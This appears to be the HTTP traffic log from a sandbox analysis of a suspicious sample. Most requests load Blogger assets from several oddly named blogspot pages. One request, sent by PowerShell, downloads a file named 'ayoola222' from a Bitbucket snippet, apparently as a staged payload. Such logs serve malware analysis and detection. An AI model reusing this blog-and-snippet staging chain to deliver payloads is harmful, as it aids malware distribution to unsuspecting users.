Source: global traffic HTTP traffic detected: GET /img/icon18_edit_allbkg.gif HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /static/v1/v-css/281434096-static_pages.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/3101730221-analytics_autotrack.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/share_buttons_20_3.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.gstatic.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /img/blogger-logotype-color-black-1x.png HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.833016469.1631746236; _gid=GA1.2.19021443.1631746236
Source: global traffic HTTP traffic detected: GET /s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.gstatic.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: randikhanaekminar.blogspot.com
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=4778963473423104316&zx=f202e5b7-10a8-4731-a0ba-0a7b50381b0c HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://randikhanaekminar.blogspot.com/p/ayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://randikhanaekminar.blogspot.com/p/ayoola.html%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:c9BBumwINGgbKZmhvCsmcJwIqGnQ7A:dvQQZbHicFDLQc5k
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoola.html&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:6n9HeR7EpH_BLBfBK28oPhchLN3ckw:TftEdtH5NeRlJzNf
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:-UtK03aR6xcHYC2IsubUGy9SL5c4yw:nFWAkb4XQpFiUmZt
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: accounts.google.comCookie: __Host-GAPS=1:5Vg_RjDpt6AvPfyva6KZpJ4lF9qr6w:sp4m46I6qe_hSWA8
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.blogger.comCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
